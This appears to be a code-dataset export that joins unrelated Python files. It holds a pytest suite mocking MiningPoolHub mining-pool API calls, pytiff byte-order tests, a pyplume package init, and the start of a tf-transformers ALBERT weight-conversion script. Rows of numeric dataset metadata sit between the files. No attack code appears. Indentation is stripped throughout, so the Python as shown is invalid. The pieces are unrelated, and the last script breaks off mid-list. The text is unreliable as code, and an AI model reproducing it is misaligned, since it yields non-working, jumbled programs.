GET_USER_BALANCES_URL = "https://ethereum.miningpoolhub.com/index.php?action=getuserbalance&api_key=test&page=api"
GET_AUTO_SWITCHING_URL = "https://miningpoolhub.com/index.php?action=getautoswitchingandprofitsstatistics&page=api"
CONTENT_HEADERS = {"Content-Type": "text/html"}
ETHEREUM = "ethereum"
@pytest.mark.asyncio
async def test_unauthorized_api_key():
"""Tests an API call with a bad API key"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(GET_USER_BALANCES_URL, status=401)
with pytest.raises(UnauthorizedError):
await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
await session.close()
@pytest.mark.asyncio
async def test_bad_coin_name(get_auto_switching_and_profits_statistics_response):
"""Tests an API call with a non-existent coin name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://doggy_coin.miningpoolhub.com/index.php?action=getuserbalance&api_key=test&page=api",
exception=aiohttp.ClientConnectionError(),
)
m.get(
GET_AUTO_SWITCHING_URL,
status=200,
body=json.dumps(get_auto_switching_and_profits_statistics_response),
headers=CONTENT_HEADERS,
)
with pytest.raises(InvalidCoinError):
await miningpoolhubapi.async_get_user_balance(coin_name="doggy_coin")
await session.close()
@pytest.mark.asyncio
async def test_bad_connection():
"""Tests an API call with a bad connection, to distinguish from a bad coin name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(GET_USER_BALANCES_URL, exception=aiohttp.ClientConnectionError())
m.get(
"https://miningpoolhub.com/index.php?action=getautoswitchingandprofitsstatistics&api_key=test&page=api",
exception=aiohttp.ClientConnectionError(),
)
with pytest.raises(aiohttp.ClientConnectionError):
await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
await session.close()
@pytest.mark.asyncio
async def test_api_rate_limit(api_rate_limit_response):
"""Tests an API call with a non-existent coin name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
GET_USER_BALANCES_URL,
status=200,
body=api_rate_limit_response,
headers=CONTENT_HEADERS,
)
with pytest.raises(APIRateLimitError):
await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
await session.close()
@pytest.mark.asyncio
async def test_get_block_count(get_block_count_response):
"""Tests an API call to get block count data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getblockcount&api_key=test&page=api",
status=200,
body=json.dumps(get_block_count_response),
headers=CONTENT_HEADERS,
)
resp = await miningpoolhubapi.async_get_block_count(coin_name=ETHEREUM)
assert isinstance(resp, int)
assert resp == 13503059
await session.close()
@pytest.mark.asyncio
async def test_get_block_stats(get_block_stats_keys, get_block_stats_response):
"""Tests an API call to get block stats data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getblockstats&api_key=test&page=api",
status=200,
payload=get_block_stats_response,
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_block_stats(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_block_stats_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_blocks_found(get_blocks_found_keys, get_blocks_found_response):
"""Tests an API call to get blocks found data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getblocksfound&api_key=test&page=api",
status=200,
body=json.dumps(get_blocks_found_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_blocks_found(coin_name=ETHEREUM)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_blocks_found_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_current_workers(get_current_workers_response):
"""Tests an API call to get current worker hash rate data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getcurrentworkers&api_key=test&page=api",
status=200,
body=json.dumps(get_current_workers_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_current_workers(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 190057
await session.close()
@pytest.mark.asyncio
async def test_get_dashboard(get_dashboard_keys, get_dashboard_data_response):
"""Tests an API call to get dashboard data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getdashboarddata&api_key=test&page=api",
status=200,
body=json.dumps(get_dashboard_data_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_dashboard(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert (
result["pool"]["info"]["currency"] == "ETH"
), "The coin name should be in the response"
assert (
result["balance_on_exchange"] is not None
), "Balance on exchange should not be null"
assert result["balance_on_exchange"] == 0.1
assert (
result["personal"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["personal"]["shares"]["valid"] == 12288
assert (
result["personal"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["personal"]["shares"]["invalid"] == 1
assert (
result["pool"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["pool"]["shares"]["valid"] == 2287112448
assert (
result["pool"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["pool"]["shares"]["invalid"] == 2129568
assert set(get_dashboard_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_dashboard_null_balance_on_exchange(
get_dashboard_keys, get_dashboard_data_response
):
"""Tests an API call to get dashboard data for a coin_name"""
get_dashboard_data_response["getdashboarddata"]["data"][
"balance_on_exchange"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["personal"]["shares"][
"valid"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["personal"]["shares"][
"invalid"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["pool"]["shares"][
"valid"
] = None
get_dashboard_data_response["getdashboarddata"]["data"]["pool"]["shares"][
"invalid"
] = None
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getdashboarddata&api_key=test&page=api",
status=200,
body=json.dumps(get_dashboard_data_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_dashboard(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert (
result["pool"]["info"]["currency"] == "ETH"
), "The coin name should be in the response"
assert (
result["balance_on_exchange"] is not None
), "Balance on exchange should not be null"
assert result["balance_on_exchange"] == 0.0
assert (
result["personal"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["personal"]["shares"]["valid"] == 0
assert (
result["personal"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["personal"]["shares"]["invalid"] == 0
assert (
result["pool"]["shares"]["valid"] is not None
), "Valid shares should not be null"
assert result["pool"]["shares"]["valid"] == 0
assert (
result["pool"]["shares"]["invalid"] is not None
), "Invalid shares should not be null"
assert result["pool"]["shares"]["invalid"] == 0
assert set(get_dashboard_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_difficulty(get_difficulty_response):
"""Tests an API call to get difficulty data for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getdifficulty&api_key=test&page=api",
status=200,
body=json.dumps(get_difficulty_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_difficulty(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 10248372611623184
await session.close()
@pytest.mark.asyncio
async def test_get_estimated_time(get_estimated_time_response):
"""Tests an API call to get estimated time for a coin_name"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getestimatedtime&api_key=test&page=api",
status=200,
body=json.dumps(get_estimated_time_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_estimated_time(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 2059292915976
await session.close()
@pytest.mark.asyncio
async def test_get_hourly_hash_rate(
get_hourly_hash_rate_keys, get_hourly_hash_rates_response
):
"""Tests an API call to get hourly hash rate data for a pool"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=gethourlyhashrates&api_key=test&page=api",
status=200,
body=json.dumps(get_hourly_hash_rates_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_hourly_hash_rate(coin_name=ETHEREUM)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_hourly_hash_rate_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_nav_bar_data(get_nav_bar_data_response):
"""Tests an API call to get nav bar data for a pool"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getnavbardata&api_key=test&page=api",
status=200,
body=json.dumps(get_nav_bar_data_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_nav_bar_data(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert result["error"] == "disabled", "The endpoint is disabled"
await session.close()
@pytest.mark.asyncio
async def test_get_pool_hash_rate(get_pool_hash_rate_response):
"""Tests an API call to get pool hash rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolhashrate&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_hash_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_hash_rate(coin_name=ETHEREUM)
assert isinstance(result, float)
assert result == 21318913068.661
await session.close()
@pytest.mark.asyncio
async def test_get_pool_info(get_pool_info_keys, get_pool_info_response):
"""Tests an API call to get pool info"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolinfo&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_info_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_info(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_pool_info_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_pool_share_rate(get_pool_share_rate_response):
"""Tests an API call to get pool share rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolsharerate&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_share_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_share_rate(coin_name=ETHEREUM)
assert isinstance(result, int)
await session.close()
@pytest.mark.asyncio
async def test_get_pool_status(get_pool_status_keys, get_pool_status_response):
"""Tests an API call to get pool status"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getpoolstatus&api_key=test&page=api",
status=200,
body=json.dumps(get_pool_status_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_pool_status(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_pool_status_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_time_since_last_block(get_time_since_last_block_response):
"""Tests an API call to get time since last block found"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=gettimesincelastblock&api_key=test&page=api",
status=200,
body=json.dumps(get_time_since_last_block_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_time_since_last_block(
coin_name=ETHEREUM
)
assert isinstance(result, int)
assert result == 1153
await session.close()
@pytest.mark.asyncio
async def test_get_top_contributors(
get_top_contributors_keys, get_top_contributors_response
):
"""Tests an API call to get top contributor information"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=gettopcontributors&api_key=test&page=api",
status=200,
body=json.dumps(get_top_contributors_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_top_contributors(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_top_contributors_keys).issubset(
result.keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_user_balance(get_user_balance_keys, get_user_balance_response):
"""Tests an API call to get user balance information"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
GET_USER_BALANCES_URL,
status=200,
body=json.dumps(get_user_balance_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_balance(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_user_balance_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_user_hash_rate(get_user_hash_rate_response):
"""Tests an API call to get user hash rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getuserhashrate&api_key=test&page=api",
status=200,
body=json.dumps(get_user_hash_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_hash_rate(coin_name=ETHEREUM)
assert isinstance(result, float)
assert result == 200431.807
await session.close()
@pytest.mark.asyncio
async def test_get_user_share_rate(get_user_share_rate_response):
"""Tests an API call to get user share rate"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getusersharerate&api_key=test&page=api",
status=200,
body=json.dumps(get_user_share_rate_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_share_rate(coin_name=ETHEREUM)
assert isinstance(result, int)
assert result == 0
await session.close()
@pytest.mark.asyncio
async def test_get_user_status(get_user_status_keys, get_user_status_response):
"""Tests an API call to get user status"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getuserstatus&api_key=test&page=api",
status=200,
body=json.dumps(get_user_status_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_status(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_user_status_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
assert result["shares"] is not None, "Invalid shares should not be null"
assert result["shares"] == 1
await session.close()
@pytest.mark.asyncio
async def test_get_user_status_null_shares(
get_user_status_keys, get_user_status_response
):
"""Tests an API call to get user status"""
get_user_status_response["getuserstatus"]["data"]["shares"] = None
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getuserstatus&api_key=test&page=api",
status=200,
body=json.dumps(get_user_status_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_status(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(get_user_status_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
assert result["shares"] is not None, "Invalid shares should not be null"
assert result["shares"] == 0
await session.close()
@pytest.mark.asyncio
async def test_get_user_transactions(
get_user_transactions_keys, get_user_transactions_response
):
"""Tests an API call to get user transactions"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getusertransactions&api_key=test&page=api",
status=200,
body=json.dumps(get_user_transactions_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_transactions(coin_name=ETHEREUM)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_user_transactions_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_user_workers(get_user_workers_keys, get_user_workers_response):
"""Tests an API call to get user workers"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=getuserworkers&api_key=test&page=api",
status=200,
body=json.dumps(get_user_workers_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_workers(coin_name=ETHEREUM)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_user_workers_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_public(public_keys, public_response):
"""Tests an API call to get public data for a a pool"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://ethereum.miningpoolhub.com/index.php?action=public&page=api",
status=200,
body=json.dumps(public_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_public(coin_name=ETHEREUM)
assert isinstance(result, dict)
assert set(public_keys).issubset(result.keys()), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_auto_switching_and_profits_statistics(
get_auto_switching_and_profits_statistics_keys,
get_auto_switching_and_profits_statistics_response,
):
"""Tests an API call to get auto switching profit and statistics"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
GET_AUTO_SWITCHING_URL,
status=200,
body=json.dumps(get_auto_switching_and_profits_statistics_response),
headers=CONTENT_HEADERS,
)
result = (
await miningpoolhubapi.async_get_auto_switching_and_profits_statistics()
)
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_auto_switching_and_profits_statistics_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_auto_switching_and_profits_statistics_fail(
get_auto_switching_and_profits_statistics_response_fail,
):
"""Tests an API call to get auto switching profit and statistics that failed"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
GET_AUTO_SWITCHING_URL,
status=200,
body=json.dumps(get_auto_switching_and_profits_statistics_response_fail),
headers=CONTENT_HEADERS,
)
with pytest.raises(APIError):
await miningpoolhubapi.async_get_auto_switching_and_profits_statistics()
await session.close()
@pytest.mark.asyncio
async def test_get_mining_profit_and_statistics(
get_mining_profit_and_statistics_keys,
get_mining_and_profit_statistics_response,
):
"""Tests an API call to get auto switching profit and statistics that failed"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
with aioresponses() as m:
m.get(
"https://miningpoolhub.com/index.php?action=getminingandprofitsstatistics&page=api",
status=200,
body=json.dumps(get_mining_and_profit_statistics_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_mining_profit_and_statistics()
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_mining_profit_and_statistics_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
@pytest.mark.asyncio
async def test_get_mining_profit_and_statistics_fail(
get_mining_and_profit_statistics_response_fail,
):
"""Tests an API call to get mining profit and statistics"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
with aioresponses() as m:
m.get(
"https://miningpoolhub.com/index.php?action=getminingandprofitsstatistics&page=api",
status=200,
body=json.dumps(get_mining_and_profit_statistics_response_fail),
headers=CONTENT_HEADERS,
)
with pytest.raises(APIError):
await miningpoolhubapi.async_get_mining_profit_and_statistics()
await session.close()
@pytest.mark.asyncio
async def test_get_user_all_balances(
get_user_all_balances_keys, get_user_all_balances_response
):
"""Tests an API call to get mining profit and statistics"""
session = aiohttp.ClientSession()
miningpoolhubapi = MiningPoolHubAPI(session=session)
assert miningpoolhubapi.api_key_set() is True
with aioresponses() as m:
m.get(
"https://miningpoolhub.com/index.php?action=getuserallbalances&api_key=test&page=api",
status=200,
body=json.dumps(get_user_all_balances_response),
headers=CONTENT_HEADERS,
)
result = await miningpoolhubapi.async_get_user_all_balances()
assert isinstance(result, list)
assert isinstance(result[0], dict)
assert set(get_user_all_balances_keys).issubset(
result[0].keys()
), NOT_ALL_KEYS_PRESENT
await session.close()
| 37.255583 | 116 | 0.690422 | 3,568 | 30,028 | 5.575673 | 0.051009 | 0.021464 | 0.028199 | 0.036493 | 0.895546 | 0.876646 | 0.867096 | 0.837539 | 0.807379 | 0.737609 | 0 | 0.00913 | 0.215732 | 30,028 | 805 | 117 | 37.301863 | 0.835626 | 0 | 0 | 0.669753 | 0 | 0.040123 | 0.137277 | 0 | 0 | 0 | 0 | 0 | 0.180556 | 1 | 0 | false | 0 | 0.009259 | 0 | 0.009259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d6ba670b89041595741efb0fec1702a59bab13d7 | 328 | py | Python | pytiff/test/test_utils.py | ch-schiffer/pytiff | 99f8a7eb6e41e974fab1d49b2979670c8346d0ae | [
"BSD-3-Clause"
] | 9 | 2017-01-04T12:43:42.000Z | 2022-03-21T11:38:14.000Z | pytiff/test/test_utils.py | ch-schiffer/pytiff | 99f8a7eb6e41e974fab1d49b2979670c8346d0ae | [
"BSD-3-Clause"
] | 19 | 2016-06-06T07:49:33.000Z | 2020-11-27T13:25:51.000Z | pytiff/test/test_utils.py | ch-schiffer/pytiff | 99f8a7eb6e41e974fab1d49b2979670c8346d0ae | [
"BSD-3-Clause"
] | 19 | 2017-02-21T12:49:39.000Z | 2022-03-21T11:39:21.000Z | from pytiff import byteorder, is_bigtiff
def test_byteorder():
assert byteorder("test_data/small_example.tif") == "<"
assert byteorder("test_data/big_endian_small_example.tif") == ">"
def test_is_bigtiff():
assert not is_bigtiff("test_data/small_example.tif")
assert is_bigtiff("test_data/bigtif_example.tif")
| 32.8 | 69 | 0.753049 | 46 | 328 | 5.021739 | 0.369565 | 0.155844 | 0.194805 | 0.199134 | 0.251082 | 0.251082 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 328 | 9 | 70 | 36.444444 | 0.802083 | 0 | 0 | 0 | 0 | 0 | 0.371951 | 0.365854 | 0 | 0 | 0 | 0 | 0.571429 | 1 | 0.285714 | true | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d6cbdffb85b4e7665a5080c3bf9bd272cc82b4d6 | 107 | py | Python | pyplume/__init__.py | awa1k3r/plume-generation-and-analysis | 926f2b09fa1011515310167f0d2b34a051539db1 | [
"BSD-3-Clause"
] | null | null | null | pyplume/__init__.py | awa1k3r/plume-generation-and-analysis | 926f2b09fa1011515310167f0d2b34a051539db1 | [
"BSD-3-Clause"
] | 1 | 2020-06-02T09:51:36.000Z | 2020-06-02T09:51:36.000Z | pyplume/__init__.py | SoftwareDevEngResearch/pyplume | f7d92b71896edc702d9ef769c510f53f118fcecf | [
"BSD-3-Clause"
] | 1 | 2020-04-16T19:15:52.000Z | 2020-04-16T19:15:52.000Z | from . import mech
from . import model
from . import figures
from . import output
from . import statistics
| 17.833333 | 24 | 0.766355 | 15 | 107 | 5.466667 | 0.466667 | 0.609756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186916 | 107 | 5 | 25 | 21.4 | 0.942529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d6f3d66d90fe504f47ba89acf208d2061aaaa7f0 | 24,286 | py | Python | src/tf_transformers/models/albert/convert.py | legacyai/tf-transformers | 65a5f9a4bcb3236483daa598a37b91673f56cb97 | [
"Apache-2.0"
] | 116 | 2021-03-15T09:48:41.000Z | 2022-03-24T05:15:51.000Z | src/tf_transformers/models/albert/convert.py | legacyai/tf-transformers | 65a5f9a4bcb3236483daa598a37b91673f56cb97 | [
"Apache-2.0"
] | 4 | 2021-03-20T11:20:57.000Z | 2022-01-05T04:59:07.000Z | src/tf_transformers/models/albert/convert.py | legacyai/tf-transformers | 65a5f9a4bcb3236483daa598a37b91673f56cb97 | [
"Apache-2.0"
] | 9 | 2021-03-17T04:14:48.000Z | 2021-09-13T07:15:31.000Z | # coding=utf-8
# Copyright 2021 TF-Transformers Authors and The TensorFlow Authors.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import tensorflow as tf
from absl import logging
from tf_transformers.core import keras_utils
def assert_model_results(model):
def get_expected_text(model_name):
if model_name == "bert_base_uncased":
expected_text = ". i want to buy the car because it is cheap.."
if model_name == "bert_base_cased" or model_name == "bert_large_cased":
expected_text = ".. want to buy the car because it is cheap.."
if model_name == "bert_large_cased":
expected_text = ".. want to buy the car because it is cheap.."
return expected_text
def assert_bert(model_name):
from transformers import BertTokenizer
model_name = model_name.replace("_", "-")
tokenizer = BertTokenizer.from_pretrained(model_name)
text = "[CLS] i want to [MASK] the car because it is cheap. [SEP]"
input_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(text))
input_ids = tf.constant([input_ids])
inputs = {}
inputs["input_ids"] = input_ids
inputs["input_mask"] = tf.ones_like(input_ids)
inputs["input_type_ids"] = tf.zeros_like(input_ids)
results = model(inputs)
expected_text = get_expected_text(model_name)
decoded_text = tokenizer.decode(tf.argmax(results["token_logits"], axis=2)[0].numpy())
assert expected_text == decoded_text
def assert_model(model_name):
assert_bert(model_name)
return assert_model
def convert_albert_pt(model, config, model_name):
"""TF converter
Args:
model_hf: HuggingFace Model (TF)
model: tf_transformers model/layer
config: dict
Returns:
a function
"""
# When dropout, use_auto_regressive is enabled assertion won't work
SKIP_ASSERT = False
try:
# LegacyLayer
local_config = model._config_dict
except Exception as e:
# LegacyModel
local_config = model.model_config
if local_config['use_dropout']:
logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
SKIP_ASSERT = True
if local_config['use_auto_regressive']:
raise ValueError(
"Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
)
SKIP_ASSERT = True
import torch
import transformers
transformers.logging.set_verbosity_error()
from_model_vars = [
"embeddings.word_embeddings.weight",
